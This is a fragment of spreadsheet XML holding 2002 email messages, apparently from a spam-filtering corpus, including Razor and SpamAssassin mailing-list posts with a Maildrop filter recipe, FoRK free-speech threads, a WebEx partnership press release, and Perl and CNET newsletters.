    <t>Here is my recipe for Maildrop: # Vipul's Razor check # log `/usr/bin/razor-check` log "razor-check = $RETURNCODE" if ( $RETURNCODE == 0 ) {   xfilter "reformail -a'X-Razor: SPAM'"   log "SPAM caught by Vipul's Razor"   to "$FOLDERS/.SPAM/" } I used this with Razor version 1.  I'm not sure if it was ever used with Razor2.  I am now using SpamAssassin w/ Razor2.  You may wish to remove the log statements once running. I use both.  SpamAssassin (SA) catches things that Razor does not.  There were enough false positives with Razor that I do not trust it alone. After whitelisting all the newsletters I receive, SA w/ Razor2 does a very good job. HTH,   Jeffrey Quoting Sunil William Savkar : &gt; Hi. &gt; &gt; I just finished installing and getting running maildrop with my virtual &gt; users.  I was thinking to set up razor with maildrop as my first test of &gt; its filtering capabilities.. &gt; &gt; I have seen documentation out there for procmail, but is there similar &gt; documentation for integrating maildrop with razor? &gt;  &gt;   &gt;  &gt; Separately, it looks like many people use spamassassin with razor.  If I &gt; am using razor2, is there still an advantage to this? &gt;  &gt;   &gt;  &gt; Thanks in advance. &gt;  &gt;   &gt;  &gt; Sunil &gt;  ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Russell Turpin" &lt;deafbox@hotmail.com&gt;\nFrom: Chuck Murcko &lt;chuck@topsail.org&gt;\nDate: Thu, 19 Sep 2002 11:01:49 -0700</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 11:01:49 -0700</t>
  </si>
  <si>
    <t>What I meant was that neither he nor anyone else has any *authority* to  say something can or can't be published, and make that stick, at least  in the US, and from some descriptions, France. Of course he can say  anything he wants. And I can choose to ignore it, or not. Works both  ways. Fscking semantics. Chuck On Thursday, September 19, 2002, at 06:41 AM, Russell Turpin wrote: &gt; Robert Harley: &gt;&gt;&gt; BTW, I wasn't aware that the 1st Amendment mandated that crap must be  &gt;&gt;&gt; FoRKed. &gt; &gt; Chuck Murcko : &gt;&gt; It doesn't, BTW. It says the right to free speech shall not be  &gt;&gt; abridged. That means *you* can't say anything may not be FoRKed or  &gt;&gt; printed or whatever. &gt; &gt; Actually, it means just the opposite. The first &gt; amendment guarantees Harley's right to say just &gt; that. For the outlets where he has editorial &gt; control, it even guarantees his right to CENSOR &gt; content published through those outlets. The &gt; first amendment doesn't limit Harley's speech, &gt; and it is neutral with regard to the selection &gt; policies of FoRK and other private venues. &gt; &gt; &gt; &gt; _________________________________________________________________ &gt; MSN Photos is the easiest way to share and print your photos:  &gt; [URL]http://photos.msn.com[/URL] &gt;</t>
  </si>
  <si>
    <t>To: "spamassassin-talk" &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: Vivek Khera &lt;khera@kcilink.com&gt;\nDate: Thu, 19 Sep 2002 10:04:01 -0400</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 10:04:01 -0400</t>
  </si>
  <si>
    <t>"spamassassin-talk" &lt;spamassassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Ignore System Messages - How?</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "v" == vernon   writes: v&gt; Some of my "Security Violations" and "Unusual System Events" are being  v&gt; tagged as SPAM by SpamAssassin. How do I get SA to ignore these messages? whitelists.  you *really* have to white list any message source that discusses or is used to report spam, else the reports will be marked as spam, given that they have the spam indicators in them, usually... This is the *only* whitelisting I use. ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "'Santiago Vila'" &lt;sanvila@unex.es&gt;\nFrom: "Boniforti Flavio" &lt;boniforti.f@co-ver.it&gt;\nDate: Thu, 19 Sep 2002 09:34:04 +0200</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 09:34:04 +0200</t>
  </si>
  <si>
    <t>"Boniforti Flavio" &lt;boniforti.f@co-ver.it&gt;</t>
  </si>
  <si>
    <t>"'Santiago Vila'" &lt;sanvila@unex.es&gt;</t>
  </si>
  <si>
    <t>RE: [Razor-users] RE: Re: Some startup questions...</t>
  </si>
  <si>
    <t>&gt; I suggest that you use a normal user to start. Once you are familiar\n&gt; enough with razor and understand how it works, try the complex things\n&gt; like integration with the MTA and the like.\n\nOK, but do I have to launch that command as "root" or what?\n\nThank you\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Razor User's List" &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Fox" &lt;lds0062@cdc.net&gt;\nDate: Thu, 19 Sep 2002 08:48:15 -0400</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 08:48:15 -0400</t>
  </si>
  <si>
    <t>[Razor-users] The -lm 4 blues</t>
  </si>
  <si>
    <t>Using -lm 4 is yielding an extra 20% a day, but it gets false positives\nwhere it shouldn't.\n\nSuch as an email with a Word doc and the signature below.  After looking at\nthe Word doc, directions to the sender's cabin, I am convinced it marked the\nbody, which contains no next except the "IncrediMail advertisment"\nsignature, as spam.\n\nSo I have to turn off -lm 4.  Razor has been getting other strange emails it\nshouldn't with -lm 4 on.\n\n      See the incredimail ad signature I am talking about below:\n\n      Fox\n\n\n\n____________________________________________________\n  IncrediMail - Email has finally evolved - Click Here\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Boniforti Flavio &lt;boniforti.f@co-ver.it&gt;\nFrom: Mike Burger &lt;mburger@bubbanfriends.org&gt;\nDate: Thu, 19 Sep 2002 07:47:15 -0500 (EST)</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 07:47:15 -0500 (EST)</t>
  </si>
  <si>
    <t>Boniforti Flavio &lt;boniforti.f@co-ver.it&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] Razor: shall I use it with AMaViS or with</t>
  </si>
  <si>
    <t>Depends on how you want to use it.\n\nThe default setup of running it from procmail works just fine, as long as \nyou remember to go into your postfix/main.cf file, and tell it to use \nprocmail instead of the internal delivery agent.\n\nOn Thu, 19 Sep 2002, Boniforti Flavio wrote:\n\n&gt; How do I intergrate razor into my postfix setup? Will it have to\n&gt; interact with AMaViS or with SpamAssassin?\n&gt; \n&gt; Thank you\n&gt; \n&gt; Boniforti Flavio\n&gt; Informa Srl\n&gt; Via 42 Martiri, 165\n&gt; 28924 Verbania (VB)\n&gt; Tel +39 0323 586216\n&gt; Fax +39 0323 586672\n&gt; [URL]http://www.co-ver.it[/URL]\n&gt; \n&gt; \n&gt; \n&gt; \n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by:ThinkGeek\n&gt; Welcome to geek heaven.\n&gt; [URL]http://thinkgeek.com[/URL]\n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n&gt; \n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.co-ver.it http://thinkgeek.com https://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: FoRK &lt;fork@spamassassin.taint.org&gt;\nFrom: Gregory Alan Bolcer &lt;gbolcer@endeavors.com&gt;\nDate: Thu, 19 Sep 2002 06:34:43 -0700</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 06:34:43 -0700</t>
  </si>
  <si>
    <t>Webex Endeavors</t>
  </si>
  <si>
    <t>We have a partnership with Webex.  We use their serivce\nfor cross-firewall app sharing--something that Netmeeting/Messenger\nand Sametime require a lot of configuration of firewalls,\nauthentications, access controls and user training for.  \n\nNow Webex has invites, instant meeting launch without any \nconfiguration. Users like it as now they have something to do \nin between Web conferences and places to store and author \ndocuments, reschedule meetings, relaunch meetings.  Webex likes \nit as people are signed on all the time.  \n\nGreg\n\n\n\nSeptember 19, 2002\n\n  Tadpole's Secure Web Software Subsidiary Endeavors Technology Teams With Web\n  Meetings Leader WebEx Communications\n  To Provide Best-of-Breed Solution For Extended Group Collaboration During\n  and Between Online Meetings\n\n  Web meetings raise the quality of team interaction and communications for\n  users of the Web's secure, P2P collaboration network\n\n  ###\n\n  Tadpole Technology plc, the mobile computing and network infrastructure\n  group, today announces that its web collaboration subsidiary, Endeavors\n  Technology, Inc., has teamed with Web meetings leader, WebEx\n  Communications,Inc. to help professionals make better use of corporate time\n  and resources, and gain competitive advantage. By integrating the advanced\n  communications capabilities of the WebEx platform with Endeavors' secure P2P\n  collaboration network, Endeavors has created a new method of world-class\n  teamwork and interaction without the hassle of travel.\n\n  With the rapid growth in popularity of Web meetings, the rationale for this\n  world-class relationship stems from the growing need for workgroups around\n  the world to maintain the quality of the team collaboration experience\n  between online meetings. The issue by those preferring not to travel is how\n  to continue to collaborate and share information with team members between\n  meetings rather than depending on intermittent, insecure email and multiple\n  copies of constantly changing documents.\n\n  Inter-meeting collaboration needs an asynchronous medium, independent of\n  time. In asynchronous mode, a team member can access, read and edit\n  information relevant to the meeting group at his/her convenience rather than\n  having to fit into the schedules and timeframes of others. A secured\n  environment available only to members of a meeting or project is also\n  essential.\n\n  Endeavors' Magi technology converts the Web into a secure platform for\n  sharing information directly from people's desktops. WebEx meetings can be\n  recorded and reviewed at any time, documents shared in the meeting can be\n  actioned in real-time or at a later date, calendars and project schedules\n  can be updated at any time, and new individuals added to the workgroup at\n  will . all in a secure environment with people working across the globe,\n  inside or outside company firewalls.\n\n  Magi peer collaboration securely delivers significant benefits to Web\n  meeting participants. Not only can they share and access information at\n  will, but they can also know which other participants are online or\n  "present." This enables them to chat and message each other, search across\n  other people's Magi environment, and work jointly on relevant documents\n  highly productively. With Magi collaboration, in tandem with WebEx\n  conferencing, the savings can be huge in terms of travel costs, phone bills,\n  and, most importantly, timely completion of projects and tasks.\n\n  "In order to realise the full potential of Web meetings, best-of-breed\n  services are needed to eliminate time and geographical boundaries," says\n  Bernard Hulme, Tadpole's group chief executive. "The powerful combination\n  of Endeavors' Magi and WebEx's communications technologies will assist\n  global work teams to better meet critical business goals and deadlines by\n  maintaining teamwork momentum within and between Web meetings."\n\n  "WebEx is transforming the way businesses use the Web for sales, marketing,\n  training, support and product design," says David Farrington, vice president\n  of corporate development at WebEx Communications. "By integrating the\n  communications capabilities of the WebEx platform with Endeavors' secure\n  collaboration network, Endeavors has created an offering that provides the\n  best in synchronous and asynchronous communications."\n\n  About Magi\n  Magi Enterprise 3.0, an award-winning web collaboration system, transforms\n  today's Web into a highly secure inter- and intra-enterprise collaboration\n  network of files and web resources. For the first time, enterprises can\n  implement ad-hoc Virtual Private Networks for collaboration very rapidly and\n  affordably without disrupting existing applications, networks or work\n  practices. Magi Enterprise 3.0 does this by effectively transforming\n  unsecured, "read-only" Web networks into two-way trusted and transparent\n  collaboration environments, through the use of such features as\n  cross-firewall connections, advanced data extraction, an intuitive graphical\n  interface, and universal name spaces generating "follow me URLs" for mobile\n  professionals.\n\n  About Endeavors Technology, Inc.\n  Endeavors Technology, Inc. is a wholly-owned subsidiary of mobile computing\n  and network infrastructure vendor Tadpole Technology plc (LSE-TAD,\n  [URL]www.tadpole.com[/URL], which has plants and offices in Irvine and Carlsbad\n  (California), and Cambridge, Edinburgh, and Bristol (UK). For further\n  information on Endeavors' P2P solutions, call 949-833-2800, email to\n  p2p@endeavors.com, or visit the company's website [URL]http://www.endeavors.com[/URL]\n\n  ends\n\n  For further information, please contact:\n\n  Bernard Hulme, Tadpole Technology - via Patcom Media\n  Hugh Paterson, Patcom Media - Tel 0207 987 4888, Email\n  hughp@patcom-media.com\n\n  Bullets for Editors\n\n  WebEx\n  Web communications services (synchronous): network-based platform for\n  delivering highly interactive, visually dynamic Web communications. The\n  WebEx platform supports real-time data, voice and video communications.\n  WebEx is the only company to design, develop and deploy a global network for\n  real-time Web communications.\n\n  Magi\n  On and off-line (asynchronous) communication and collaboration: cross\n  enterprise search and discovery, transparent security and trust (SSL &amp; PKI),\n  2-way web access to files and applications, permanent cross firewall access,\n  ad hoc and permanent secure groups, centralized or decentralized control of\n  access lists and security privileges, centralized caching of information\n  (never lose anything critical), multi-device access to information (desktop,\n  laptop, PDA).</t>
  </si>
  <si>
    <t>www.tadpole.com http://www.endeavors.com</t>
  </si>
  <si>
    <t>To: "Owen Byrne" &lt;owen@permafrost.net&gt;\nFrom: Chuck Murcko &lt;chuck@topsail.org&gt;\nDate: Thu, 19 Sep 2002 04:44:22 -0700</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 04:44:22 -0700</t>
  </si>
  <si>
    <t>Heh, ten years ago saying the exact same words was most definitely not \n"parroting the party line".\n\nIt was even less so thirty years ago. My story remains the same, take it \nor leave it. I've said the same words to white supremacists as to \nsuburban leftist punks as to homeys as to French Irish, etc. etc.:\n\nI don't have to agree with anything you say. I *am* obligated to defend \nto the death your right to say it. I don't give a rat's ass where you \nsay it, even in France. I don't care where the political pendulum has \nswung currently.\n\nChuck\n\nOn Tuesday, September 17, 2002, at 10:38 AM, Owen Byrne wrote:\n\n&gt; On Tue, Sep 17, 2002 at 10:19:13AM -0700, Chuck Murcko wrote:\n&gt;&gt; Probably because we have this pesky 1st Amendment thing here. Still,\n&gt;&gt; lots of us in the States have developed a disturbing tendency to shout\n&gt;&gt; down or (in recent years) shackle in legal BS opinions, thoughts, and\n&gt;&gt; individual behaviors we don't agree with.\n&gt;&gt;\n&gt;\n&gt; Except that parroting the party line doesn't really require much\n&gt; freedom of speech. Now if you had posted something from a left of\n&gt; center source, you would have been shouted down in flames, buried in\n&gt; ad hominem attacks, and probably get your name added to an FBI list.\n&gt;\n&gt;\n&gt; Besides the basic rule in the United States now is "I'll defend your\n&gt; rights to say anything you want, but if it isn't appropriately\n&gt; neoconish, well, don't expect to work":\n&gt;\n&gt;\n&gt; HHS Seeks Science Advice to Match Bush Views\n&gt;\n&gt; By Rick Weiss\n&gt; Washington Post Staff Writer\n&gt; Tuesday, September 17, 2002; Page A01\n&gt;\n&gt; The Bush administration has begun a broad restructuring of the\n&gt; scientific advisory committees that guide federal policy in areas such\n&gt; as patients' rights and public health, eliminating some committees\n&gt; that were coming to conclusions at odds with the president's views and\n&gt; in other cases replacing members with handpicked choices.\n&gt; ...\n&gt; [URL]http://www.washingtonpost.com[/URL]\n&gt;\n&gt; Owen\n&gt;</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Thu, 19 Sep 2002 02:00:33 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 02:00:33 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-09-19</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * How much does Perl, PHP, Java, or Lisp suck?\n\n+--------------------------------------------------------------------+\n| How much does Perl, PHP, Java, or Lisp suck?                       |\n|   posted by pudge on Wednesday September 18, @08:08 (links)        |\n|   [URL]http://use.perl.org[/URL]               |\n+--------------------------------------------------------------------+\n\n[0]brian_d_foy writes "A long time ago Don Marti started the OS\nSucks-Rules-O-Meter, and Jon Orwant wrote his own Sucks-Rules-O-Meter for\ncomputer languages. Recently Dan Brian improved on that with a little bit\nof natural language processing. Now [1]The Perl Review makes pretty\npictures of it all. Based on searches of AltaVista and Google, we found\nthat not a lot of people think PHP or Lisp sucks, a lot think C++ and\nJava suck, and they put Perl is somewhere in the middle. Does Perl suck\nmore than it use to suck, or has PHP just shot way ahead?"\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://www.theperlreview.com[/URL]\n    1. [URL]http://www.theperlreview.com[/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theperlreview.com http://www.theperlreview.com http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Thu, 19 Sep 2002 02:00:25 +0000</t>
  </si>
  <si>
    <t>Thu, 19 Sep 2002 02:00:25 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-09-19</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nHow much does Perl, PHP, Java, or Lisp suck?\n    posted by pudge on Wednesday September 18, @08:08 (link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ilug@linux.ie\nFrom: John Gay &lt;johngay@eircom.net&gt;\nDate: Thu, 18 Jul 2002 23:13:24 +0100</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 23:13:24 +0100</t>
  </si>
  <si>
    <t>John Gay &lt;johngay@eircom.net&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] CVS question?</t>
  </si>
  <si>
    <t>Well, as many have said, it's non-trivial and not smart enough.\n\nI did try just cvs'ing over the existing sources, but cvs complained that my \nfiles were in the way.\n\nThen I thought that I'd only need the DRI stuff, that took about 1.5 hours to \nfetch 116M. Unfortunately I still need the XFree86 cvs stuff as well :-( At \n339M that took almost 3 hours.\n\nNow I can start building the XFree86 cvs and DRI cvs stuff for testing the 3D \npatches for my GVX1 card. I just hope I don't completely trash my system in \nthe process. \n\nThink I'll wait until morning to start building, though. I've been building a \nnew box from source this week. A 200Mhz PentiumMMX with 96M. It took a full \nday to build XFree86 4.2.0 and 2.5 days each to build qtlibs and kdelibs. \nkdebase took just under 46 hours. I've got lots of grief from the wife for \nthe computer running 'round the clock this week. The rest of KDE should build \nin under 20 hour increments.\n\nCheers,\n\n	John Gay\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: CNET Cell Phone Weekly Newsletter &lt;Online#3.20520.de-C6GhlCa9O-fqvRRR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 17:20:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 17:20:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Cell Phone Weekly Newsletter &lt;Online#3.20520.de-C6GhlCa9O-fqvRRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Cordless phones: the other wireless devices</t>
  </si>
  <si>
    <t>![CNET Wireless\nDispatch]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n  \n![]([URL]http://i.i.com.com[/URL]\n![]([URL]http://view.atdmt.com[/URL];wi.160;hi.600/01/)\n\n  \n|  ![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nWireless All CNET The Web  \n---  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \nJuly 18, 2002  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | Cordless phones: the other\nwireless devices  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL] | Samsung SPH-A460  \n  \n![]([URL]http://home.cnet.com[/URL] | What phones are hot in Asia--\nupdated  \n  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n|\n\n**Wireless Top 5s**  \n\n  * Top 5 AT&amp;T; Wireless cell phones  \n\n  * Top 5 Sprint PCS phones  \n\n  * Top 5 Verizon Wireless cell phones\n\nAll Top 5s\n\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n  \n![Crucial Clicks]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | **Next-generation MP3 players**  \nThese three hard drive-based MP3 players turn last year's models into\npaperweights.  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \nÂ• Mojo rising: TDK's new MP3 CD player  \nÂ• The Nomad Jukebox 3 breaks new ground  \n  \n![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n**Most popular**  \n![]([URL]http://home.cnet.com[/URL]  \n**MP3 &amp; Audio**  \n![]([URL]http://home.cnet.com[/URL]  \n1\. Creative Labs Nomad Jukebox 3  \n![]([URL]http://home.cnet.com[/URL]  \n2\. Digitalway MPIO-DMK (128 MB)  \n![]([URL]http://home.cnet.com[/URL]  \n3\. Bantam Interactive Explor BA350  \n![]([URL]http://home.cnet.com[/URL]  \n4\. iRiver SlimX iMP-350  \n![]([URL]http://home.cnet.com[/URL]  \n5\. Sonicblue Rio Volt SP250  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL] **See all most popular**  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![Reviews &amp; Features]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n**Cordless phones: the other wireless devices**  \nIn the market for a new cordless phone but don't know whether to buy a 900MHz\nor 2.4GHz model or what manufacturer offers the best product? No sweat--check\nout our new line coverage to find the phone that fits your personal style and\nneeds.  \n**Read the reviews **  \n  \n**Samsung SPH-A460**  \nThe update to the SPH-A400 offers some cool enhancements, such as an external\nLCD. Is this the flip phone of the moment for Sprint PCS service?  \n**Read the review  | Check latest prices**  \n![]([URL]http://home.cnet.com[/URL]  \n**What phones are hot in Asia--updated**  \nWonder what people are talking on over on the other side of the Pacific? Check\nout the most current top 10 list from our sister site in Singapore.  \n**See the list  \n  \n\n![]([URL]http://home.cnet.com[/URL]\n![]([URL]http://home.cnet.com[/URL] | **\n\n  * Live tech help; submit your question now\n  * CNET News.com: Top CIOs on the future of IT\n  * Find a job you love, with more than 1 million postings\n  * ZDNet: This IT director has had enough of Microsoft\n  * May Editors' Choice award: Pioneer's home-theater system, the HTS-910DV \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zdnet@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59&amp;ISSUE=2002-07-18)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://i.i.com.com http://view.atdmt.com http://a.r.tv.com http://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a.r.tv.com http://home.cnet.com http://home.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zdnet@example.com\nFrom: CNET Digital Dispatch &lt;Online#3.20516.fc-LmYwlaX_4cin49RR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 17:12:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 17:12:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Digital Dispatch &lt;Online#3.20516.fc-LmYwlaX_4cin49RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET DIGITAL DISPATCH: Mac zealots unite</t>
  </si>
  <si>
    <t>![Digital Dispatch]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://cnet.com[/URL]  \n  \nAll CNET The Web  \n---  \n  \n![Tech News News.com]([URL]http://www.cnet.com[/URL]  \nMacworld 2002: New iPods, bigger iMac and more\n\nDell squeezes Pentiums into notebooks\n\nMicrosoft sweetens Mac Office offer\n\nMSN previews next Net service\n\nFuture fuzzy for Adobe camera software  \n  \n---  \n**More CNET News**  \n  \n![Top Downloads]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nOpera 6.04  \n---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nFileMaker Pro 6.0v2  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nBalls of Steel Patch 1.3  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \nMarine Aquarium 0.99.0 (for the Mac)  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n![Editors' Choice]([URL]http://www.cnet.com[/URL]  \nSamsung ML-1430 laser printer ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Hardware  \n---  \nUnitech 2U4U DMR-300 MP3 player ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \nVideo Explosion Deluxe ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Software  \nSony Ericsson T68 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Wireless  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n  \n| ![]([URL]http://www.cnet.com[/URL]  \n  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL]  \n|  | July 18, 2002  \n  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n\--Janice Chen,  \neditor in chief,  \nCNET Reviews  \n|  |  **Dear readers,**  \nThe majority of PC users may run Windows, but Microsoft can't touch the\npassion that Mac users bring to computing. This week, Apple devotees gathered\nin New York to find out what their guru, Steve Jobs, has in store for them.\nThey were not disappointed, with offerings ranging from the new iMacs, which\ncontinue to push the boundaries of the PC form factor, to updated iPods that\ninclude more memory, better menus, and compatibility with Windows. Read the\nfull coverage from CNET's News.com.  \n  \n  \n---|---|---  \n---  \n![This Week's Buzz Meter]([URL]http://www.cnet.com[/URL]  \n| Readers mourn Gene Kan  \n  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![Crucial Clicks]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | **2GHz to go**  \nCheck out the first 2GHz portable powerhouses from Dell and WinBook that push\nthe performance envelope.  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \nÂ• IBM thin-and-light ThinkPads fit to a T  \nÂ• HP xe4500: the last of the Omnibooks  \n  \n![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n**Most popular products**  \n![]([URL]http://home.cnet.com[/URL]  \n**Notebooks**  \n![]([URL]http://home.cnet.com[/URL]  \n1\. Gateway 600XL  \n![]([URL]http://home.cnet.com[/URL]  \n2\. Dell Inspiron 2600 series  \n![]([URL]http://home.cnet.com[/URL]  \n3\. Dell Inspiron 8200 series  \n![]([URL]http://home.cnet.com[/URL]  \n4\. Toshiba Satellite 2400-S251  \n![]([URL]http://home.cnet.com[/URL]  \n5\. Toshiba Satellite 5105-S607  